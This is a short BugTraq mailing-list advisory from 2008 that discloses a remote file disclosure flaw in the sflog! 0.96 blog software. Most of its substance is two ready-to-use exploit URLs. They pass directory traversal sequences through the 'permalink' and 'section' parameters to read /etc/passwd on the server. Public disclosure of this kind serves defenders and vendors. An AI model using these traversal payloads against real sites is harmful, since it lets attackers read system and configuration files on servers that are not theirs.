BugTraq
sflog! 0.96 remote file disclosure vulnerabilities Jan 31 2008 03:50PM
muuratsalo experimental hack lab (muuratsalo gmail com)
sflog! 0.96 remote file disclosure vulnerabilities

download http://sourceforge.net/projects/sflog/

author muuratsalo
contact muuratsalo[at]gmail.com

exploits
http://localhost/sflog/?blog=test&permalink=../../../../../../../../../.
./etc/passwd
http://localhost/sflog/index.php?blog=test&section=../../../../../../../
../../../etc/passwd

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus